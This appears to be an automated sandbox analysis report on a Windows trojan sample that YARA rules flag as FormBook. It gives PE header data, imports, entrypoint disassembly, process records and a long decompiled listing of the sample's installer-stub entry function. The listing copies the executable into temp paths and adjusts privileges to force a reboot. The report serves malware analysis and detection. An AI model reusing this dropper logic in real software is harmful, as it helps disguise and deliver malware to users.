                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403486
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A130h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B0h]
                                                        call dword ptr [004080C0h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F44Ch], eax
                                                        je 00007FBF008665B3h
                                                        push ebx
                                                        call 00007FBF0086972Eh
                                                        cmp eax, ebx
                                                        je 00007FBF008665A9h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007FBF008696AAh
                                                        push esi
                                                        call dword ptr [004080B8h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007FBF0086658Dh
                                                        push 0000000Bh
                                                        call 00007FBF00869702h
                                                        push 00000009h
                                                        call 00007FBF008696FBh
                                                        push 00000007h
                                                        mov dword ptr [0042F444h], eax
                                                        call 00007FBF008696EFh
                                                        cmp eax, ebx
                                                        je 00007FBF008665B1h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007FBF008665A9h
                                                        or byte ptr [0042F44Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F518h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429878h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A1ECh

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x97c.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x65ad0x6600False0.675628063725data6.48593060343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x13800x1400False0.4634765625data5.26110074066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x255580x600False0.470052083333data4.21916068772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0x380000x97c0xa00False0.453515625data4.29529055645IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_DIALOG0x381480x100dataEnglishUnited States
                                                        RT_DIALOG0x382480x11cdataEnglishUnited States
                                                        RT_DIALOG0x383640x60dataEnglishUnited States
                                                        RT_VERSION0x383c40x278dataEnglishUnited States
                                                        RT_MANIFEST0x3863c0x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                        Imports

                                                        DLLImport
                                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                        Version Infos

                                                        DescriptionData
                                                        LegalCopyrightCopyright fuel-air explosive
                                                        FileVersion69.46.40.87
                                                        CompanyNamearithmetic
                                                        LegalTrademarksstack
                                                        CommentsDone-S
                                                        ProductNamedehumidify
                                                        FileDescriptionentail
                                                        Translation0x0409 0x04e4

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        No network behavior found

                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Start time:11:51:33
                                                        Start date:23/02/2021
                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe'
                                                        Imagebase:0x400000
                                                        File size:217624 bytes
                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.211020267.0000000002A50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        General

                                                        Start time:11:51:34
                                                        Start date:23/02/2021
                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe'
                                                        Imagebase:0x400000
                                                        File size:217624 bytes
                                                        MD5 hash:2915C0AFB0B6B26A5A699965D2119F7A
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.209279370.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.211005470.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Executed Functions

                                                          C-Code - Quality: 86%
                                                          			_entry_() {
                                                          				signed int _t42;
                                                          				intOrPtr* _t47;
                                                          				CHAR* _t51;
                                                          				char* _t53;
                                                          				CHAR* _t55;
                                                          				void* _t59;
                                                          				intOrPtr _t61;
                                                          				int _t63;
                                                          				int _t66;
                                                          				signed int _t67;
                                                          				int _t68;
                                                          				signed int _t70;
                                                          				void* _t94;
                                                          				signed int _t110;
                                                          				void* _t113;
                                                          				void* _t118;
                                                          				intOrPtr* _t119;
                                                          				char _t122;
                                                          				signed int _t141;
                                                          				signed int _t142;
                                                          				int _t150;
                                                          				void* _t151;
                                                          				intOrPtr* _t153;
                                                          				CHAR* _t156;
                                                          				CHAR* _t157;
                                                          				void* _t159;
                                                          				char* _t160;
                                                          				void* _t163;
                                                          				void* _t164;
                                                          				char _t189;
                                                          
                                                          				 *(_t164 + 0x18) = 0;
                                                          				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                          				 *(_t164 + 0x20) = 0;
                                                          				 *(_t164 + 0x14) = 0x20;
                                                          				SetErrorMode(0x8001); // executed
                                                          				_t42 = GetVersion() & 0xbfffffff;
                                                          				 *0x42f44c = _t42;
                                                          				if(_t42 != 6) {
                                                          					_t119 = E00406656(0);
                                                          					if(_t119 != 0) {
                                                          						 *_t119(0xc00);
                                                          					}
                                                          				}
                                                          				_t156 = "UXTHEME";
                                                          				do {
                                                          					E004065E8(_t156); // executed
                                                          					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                          				} while ( *_t156 != 0);
                                                          				E00406656(0xb);
                                                          				 *0x42f444 = E00406656(9);
                                                          				_t47 = E00406656(7);
                                                          				if(_t47 != 0) {
                                                          					_t47 =  *_t47(0x1e);
                                                          					if(_t47 != 0) {
                                                          						 *0x42f44f =  *0x42f44f | 0x00000040;
                                                          					}
                                                          				}
                                                          				__imp__#17(_t159);
                                                          				__imp__OleInitialize(0); // executed
                                                          				 *0x42f518 = _t47;
                                                          				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
                                                          				E0040624D("Setup Setup", "NSIS Error");
                                                          				_t51 = GetCommandLineA();
                                                          				_t160 = "\"C:\\Users\\hardz\\Desktop\\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe\" ";
                                                          				E0040624D(_t160, _t51);
                                                          				 *0x42f440 = 0x400000;
                                                          				_t53 = _t160;
                                                          				if("\"C:\\Users\\hardz\\Desktop\\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe\" " == 0x22) {
                                                          					 *(_t164 + 0x14) = 0x22;
                                                          					_t53 =  &M00435001;
                                                          				}
                                                          				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
                                                          				 *(_t164 + 0x1c) = _t55;
                                                          				while(1) {
                                                          					_t122 =  *_t55;
                                                          					_t172 = _t122;
                                                          					if(_t122 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t122 - 0x20;
                                                          					if(_t122 != 0x20) {
                                                          						L13:
                                                          						__eflags =  *_t55 - 0x22;
                                                          						 *(_t164 + 0x14) = 0x20;
                                                          						if( *_t55 == 0x22) {
                                                          							_t55 =  &(_t55[1]);
                                                          							__eflags = _t55;
                                                          							 *(_t164 + 0x14) = 0x22;
                                                          						}
                                                          						__eflags =  *_t55 - 0x2f;
                                                          						if( *_t55 != 0x2f) {
                                                          							L25:
                                                          							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
                                                          							__eflags =  *_t55 - 0x22;
                                                          							if(__eflags == 0) {
                                                          								_t55 =  &(_t55[1]);
                                                          								__eflags = _t55;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							_t55 =  &(_t55[1]);
                                                          							__eflags =  *_t55 - 0x53;
                                                          							if( *_t55 != 0x53) {
                                                          								L20:
                                                          								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
                                                          								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
                                                          									L24:
                                                          									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
                                                          									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
                                                          										 *((char*)(_t55 - 2)) = 0;
                                                          										__eflags =  &(_t55[2]);
                                                          										E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t55[2]));
                                                          										L30:
                                                          										_t157 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                                          										GetTempPathA(0x400, _t157);
                                                          										_t59 = E00403455(_t172);
                                                          										_t173 = _t59;
                                                          										if(_t59 != 0) {
                                                          											L33:
                                                          											DeleteFileA("1033"); // executed
                                                          											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
                                                          											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                          											if(_t61 != 0) {
                                                          												L43:
                                                          												E0040396E();
                                                          												__imp__OleUninitialize();
                                                          												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                          												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                          													__eflags =  *0x42f4f4;
                                                          													if( *0x42f4f4 == 0) {
                                                          														L67:
                                                          														_t63 =  *0x42f50c;
                                                          														__eflags = _t63 - 0xffffffff;
                                                          														if(_t63 != 0xffffffff) {
                                                          															 *(_t164 + 0x14) = _t63;
                                                          														}
                                                          														ExitProcess( *(_t164 + 0x14));
                                                          													}
                                                          													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                          													__eflags = _t66;
                                                          													_t150 = 2;
                                                          													if(_t66 != 0) {
                                                          														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                          														 *(_t164 + 0x38) = 1;
                                                          														 *(_t164 + 0x44) = _t150;
                                                          														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                          													}
                                                          													_t67 = E00406656(4);
                                                          													__eflags = _t67;
                                                          													if(_t67 == 0) {
                                                          														L65:
                                                          														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                          														__eflags = _t68;
                                                          														if(_t68 != 0) {
                                                          															goto L67;
                                                          														}
                                                          														goto L66;
                                                          													} else {
                                                          														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                          														__eflags = _t70;
                                                          														if(_t70 == 0) {
                                                          															L66:
                                                          															E0040140B(9);
                                                          															goto L67;
                                                          														}
                                                          														goto L65;
                                                          													}
                                                          												}
                                                          												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                          												ExitProcess(2);
                                                          											}
                                                          											if( *0x42f460 == 0) {
                                                          												L42:
                                                          												 *0x42f50c =  *0x42f50c | 0xffffffff;
                                                          												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
                                                          												goto L43;
                                                          											}
                                                          											_t153 = E00405C10(_t160, 0);
                                                          											if(_t153 < _t160) {
                                                          												L39:
                                                          												_t182 = _t153 - _t160;
                                                          												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                          												if(_t153 < _t160) {
                                                          													_t151 = E004058D4(_t185);
                                                          													lstrcatA(_t157, "~nsu");
                                                          													if(_t151 != 0) {
                                                          														lstrcatA(_t157, "A");
                                                          													}
                                                          													lstrcatA(_t157, ".tmp");
                                                          													_t162 = "C:\\Users\\hardz\\Desktop";
                                                          													if(lstrcmpiA(_t157, "C:\\Users\\hardz\\Desktop") != 0) {
                                                          														_push(_t157);
                                                          														if(_t151 == 0) {
                                                          															E004058B7();
                                                          														} else {
                                                          															E0040583A();
                                                          														}
                                                          														SetCurrentDirectoryA(_t157);
                                                          														_t189 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                                                          														if(_t189 == 0) {
                                                          															E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t162);
                                                          														}
                                                          														E0040624D(0x430000,  *(_t164 + 0x1c));
                                                          														_t137 = "A";
                                                          														_t163 = 0x1a;
                                                          														 *0x430400 = "A";
                                                          														do {
                                                          															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
                                                          															DeleteFileA(0x429478);
                                                          															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\SecuriteInfo.com.Trojan.Win32.RL_Androm.R367639.12654.exe", 0x429478, 1) != 0) {
                                                          																E0040602C(_t137, 0x429478, 0);
                                                          																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
                                                          																_t94 = E004058EC(0x429478);
                                                          																if(_t94 != 0) {
                                                          																	CloseHandle(_t94);
                                                          																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                          																}
                                                          															}
                                                          															 *0x430400 =  *0x430400 + 1;
                                                          															_t163 = _t163 - 1;
                                                          														} while (_t163 != 0);
                                                          														E0040602C(_t137, _t157, 0);
                                                          													}
                                                          													goto L43;
                                                          												}
                                                          												 *_t153 = 0;
                                                          												_t154 = _t153 + 4;
                                                          												if(E00405CD3(_t182, _t153 + 4) == 0) {
                                                          													goto L43;
                                                          												}
                                                          												E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
                                                          												E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t154);
                                                          												 *((intOrPtr*)(_t164 + 0x10)) = 0;
                                                          												goto L42;
                                                          											}
                                                          											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
                                                          											while( *_t153 != _t110) {
                                                          												_t153 = _t153 - 1;
                                                          												if(_t153 >= _t160) {
                                                          													continue;
                                                          												}
                                                          												goto L39;
                                                          											}
                                                          											goto L39;
                                                          										}
                                                          										GetWindowsDirectoryA(_t157, 0x3fb);
                                                          										lstrcatA(_t157, "\\Temp");
                                                          										_t113 = E00403455(_t173);
                                                          										_t174 = _t113;
                                                          										if(_t113 != 0) {
                                                          											goto L33;
                                                          										}
                                                          										GetTempPathA(0x3fc, _t157);
                                                          										lstrcatA(_t157, "Low");
                                                          										SetEnvironmentVariableA("TEMP", _t157);
                                                          										SetEnvironmentVariableA("TMP", _t157);
                                                          										_t118 = E00403455(_t174);
                                                          										_t175 = _t118;
                                                          										if(_t118 == 0) {
                                                          											goto L43;
                                                          										}
                                                          										goto L33;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								_t141 = _t55[4];
                                                          								__eflags = _t141 - 0x20;
                                                          								if(_t141 == 0x20) {
                                                          									L23:
                                                          									_t15 = _t164 + 0x20;
                                                          									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
                                                          									__eflags =  *_t15;
                                                          									goto L24;
                                                          								}
                                                          								__eflags = _t141;
                                                          								if(_t141 != 0) {
                                                          									goto L24;
                                                          								}
                                                          								goto L23;
                                                          							}
                                                          							_t142 = _t55[1];
                                                          							__eflags = _t142 - 0x20;
                                                          							if(_t142 == 0x20) {
                                                          								L19:
                                                          								 *0x42f500 = 1;
                                                          								goto L20;
                                                          							}
                                                          							__eflags = _t142;
                                                          							if(_t142 != 0) {
                                                          								goto L20;
                                                          							}
                                                          							goto L19;
                                                          						}
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          					do {
                                                          						L12:
                                                          						_t55 =  &(_t55[1]);
                                                          						__eflags =  *_t55 - 0x20;
                                                          					} while ( *_t55 == 0x20);
                                                          					goto L13;
                                                          				}
                                                          				goto L30;
                                                          			}

































                                                          0x00403496
                                                          0x0040349a
                                                          0x004034a2
                                                          0x004034a6
                                                          0x004034ab
                                                          0x004034b7
                                                          0x004034c0
                                                          0x004034c5
                                                          0x004034c8
                                                          0x004034cf
                                                          0x004034d6
                                                          0x004034d6
                                                          0x004034cf
                                                          0x004034d8
                                                          0x004034dd
                                                          0x004034de
                                                          0x004034ea
                                                          0x004034ee
                                                          0x004034f4
                                                          0x00403502
                                                          0x00403507
                                                          0x0040350e
                                                          0x00403512
                                                          0x00403516
                                                          0x00403518
                                                          0x00403518
                                                          0x00403516
                                                          0x00403520
                                                          0x00403527
                                                          0x0040352d
                                                          0x00403543
                                                          0x00403553
                                                          0x00403558
                                                          0x0040355e
                                                          0x00403565
                                                          0x00403571
                                                          0x0040357b
                                                          0x0040357d
                                                          0x0040357f
                                                          0x00403584
                                                          0x00403584
                                                          0x00403594
                                                          0x0040359a
                                                          0x00403663
                                                          0x00403663
                                                          0x00403665
                                                          0x00403667
                                                          0x00000000
                                                          0x00000000
                                                          0x004035a3
                                                          0x004035a6
                                                          0x004035ae
                                                          0x004035ae
                                                          0x004035b1
                                                          0x004035b6
                                                          0x004035b8
                                                          0x004035b8
                                                          0x004035b9
                                                          0x004035b9
                                                          0x004035be
                                                          0x004035c1
                                                          0x00403653
                                                          0x00403658
                                                          0x0040365d
                                                          0x00403660
                                                          0x00403662
                                                          0x00403662
                                                          0x00403662
                                                          0x00000000
                                                          0x004035c7
                                                          0x004035c7
                                                          0x004035c8
                                                          0x004035cb
                                                          0x004035e3
                                                          0x0040360e
                                                          0x00403610
                                                          0x00403623
                                                          0x0040364e
                                                          0x00403651
                                                          0x0040366f
                                                          0x00403672
                                                          0x0040367b
                                                          0x00403680
                                                          0x00403686
                                                          0x00403691
                                                          0x00403693
                                                          0x00403698
                                                          0x0040369a
                                                          0x004036f2
                                                          0x004036f7
                                                          0x00403701
                                                          0x00403708
                                                          0x0040370c
                                                          0x004037a0
                                                          0x004037a0
                                                          0x004037a5
                                                          0x004037ab
                                                          0x004037b0
                                                          0x004038d4
                                                          0x004038da
                                                          0x00403956
                                                          0x00403956
                                                          0x0040395b
                                                          0x0040395e
                                                          0x00403960
                                                          0x00403960
                                                          0x00403968
                                                          0x00403968
                                                          0x004038ea
                                                          0x004038f2
                                                          0x004038f4
                                                          0x004038f5
                                                          0x00403902
                                                          0x00403915
                                                          0x0040391d
                                                          0x00403921
                                                          0x00403921
                                                          0x00403929
                                                          0x0040392e
                                                          0x00403935
                                                          0x00403943
                                                          0x00403945
                                                          0x0040394b
                                                          0x0040394d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403937
                                                          0x0040393d
                                                          0x0040393f
                                                          0x00403941
                                                          0x0040394f
                                                          0x00403951
                                                          0x00000000
                                                          0x00403951
                                                          0x00000000
                                                          0x00403941
                                                          0x00403935
                                                          0x004037bf
                                                          0x004037c6
                                                          0x004037c6
                                                          0x00403718
                                                          0x00403790
                                                          0x00403790
                                                          0x0040379c
                                                          0x00000000
                                                          0x0040379c
                                                          0x00403721
                                                          0x00403725
                                                          0x0040375b
                                                          0x0040375b
                                                          0x0040375d
                                                          0x00403765
                                                          0x004037d7
                                                          0x004037d9
                                                          0x004037e0
                                                          0x004037e8
                                                          0x004037e8
                                                          0x004037f3
                                                          0x004037f8
                                                          0x00403807
                                                          0x0040380b
                                                          0x0040380c
                                                          0x00403815
                                                          0x0040380e
                                                          0x0040380e
                                                          0x0040380e
                                                          0x0040381b
                                                          0x00403821
                                                          0x00403827
                                                          0x0040382f
                                                          0x0040382f
                                                          0x0040383d
                                                          0x00403842
                                                          0x00403854
                                                          0x0040385c
                                                          0x00403862
                                                          0x0040386e
                                                          0x00403874
                                                          0x0040387e
                                                          0x00403894
                                                          0x004038a5
                                                          0x004038ab
                                                          0x004038b2
                                                          0x004038b5
                                                          0x004038bb
                                                          0x004038bb
                                                          0x004038b2
                                                          0x004038bf
                                                          0x004038c5
                                                          0x004038c5
                                                          0x004038ca
                                                          0x004038ca
                                                          0x00000000
                                                          0x00403807
                                                          0x00403767
                                                          0x00403769
                                                          0x00403774
                                                          0x00000000
                                                          0x00000000
                                                          0x0040377c
                                                          0x00403787
                                                          0x0040378c
                                                          0x00000000
                                                          0x0040378c
                                                          0x00403750
                                                          0x00403752
                                                          0x00403756
                                                          0x00403759
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403759
                                                          0x00000000
                                                          0x00403752
                                                          0x004036a2
                                                          0x004036ae
                                                          0x004036b3
                                                          0x004036b8
                                                          0x004036ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004036c2
                                                          0x004036ca
                                                          0x004036db
                                                          0x004036e3
                                                          0x004036e5
                                                          0x004036ea
                                                          0x004036ec
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004036ec
                                                          0x00000000
                                                          0x00403651
                                                          0x00403612
                                                          0x00403615
                                                          0x00403618
                                                          0x0040361e
                                                          0x0040361e
                                                          0x0040361e
                                                          0x0040361e
                                                          0x00000000
                                                          0x0040361e
                                                          0x0040361a
                                                          0x0040361c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040361c
                                                          0x004035cd
                                                          0x004035d0
                                                          0x004035d3
                                                          0x004035d9
                                                          0x004035d9
                                                          0x00000000
                                                          0x004035d9
                                                          0x004035d5
                                                          0x004035d7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035d7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004035a8
                                                          0x004035a8
                                                          0x004035a8
                                                          0x004035a9
                                                          0x004035a9
                                                          0x00000000
                                                          0x004035a8
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 004034AB
                                                          • GetVersion.KERNEL32 ref: 004034B1
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
